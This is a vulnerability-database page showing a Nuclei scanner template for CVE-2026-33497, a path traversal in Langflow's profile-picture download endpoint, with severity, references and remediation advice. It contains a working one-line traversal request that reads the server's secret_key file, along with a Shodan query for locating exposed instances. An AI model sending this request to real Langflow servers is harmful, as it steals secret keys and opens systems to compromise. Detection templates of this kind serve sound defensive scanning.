Lucene search
+L

Langflow < 1.7.0 - Path Traversal

🗓️ 23 Jul 2026 03:49:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 4 Views

Langflow path traversal before 1.7.1 exposes secret_key via profile picture download.

Related
Refs
Code
id: CVE-2026-33497

info:
  name: Langflow < 1.7.0 - Path Traversal
  author: xtr0nix
  severity: high
  description: |
    Langflow < 1.7.1 contains a path traversal caused by insufficient filtering of folder_name and file_name parameters in download_profile_picture endpoint, letting attackers read secret_key across directories, exploit requires crafted request.
  impact: |
    Attackers can read sensitive secret_key files across directories, potentially compromising system security.
  remediation: |
    Update to version 1.7.1 or later.
  reference:
    - https://github.com/langflow-ai/langflow/security/advisories/GHSA-ph9w-r52h-28p7
    - https://nvd.nist.gov/vuln/detail/CVE-2026-33497
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2026-33497
    epss-score: 0.19584
    epss-percentile: 0.97102
    cwe-id: CWE-22
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"Langflow"
  tags: cve,cve2026,langflow,traversal

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/v1/files/profile_pictures/../secret_key"

    matchers:
      - type: dsl
        dsl:
          - len(body) == 43
          - status_code == 200
          - contains(content_type, 'application/octet-stream')
        condition: and
# digest: 4a0a00473045022100dc173c226085c5c8d9c3693bf9d0671e0bc8d649f1d16dad6ab74cb166a13f4502204c6350ee074996f149dd33b20b83b2f5d331f42beaefd465ddb090a9e068251f:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

13 Jul 2026 20:17Current
5.2Medium risk
Vulners AI Score5.2
CVSS 3.17.5
CVSS 48.7
EPSS0.19584
SSVC
4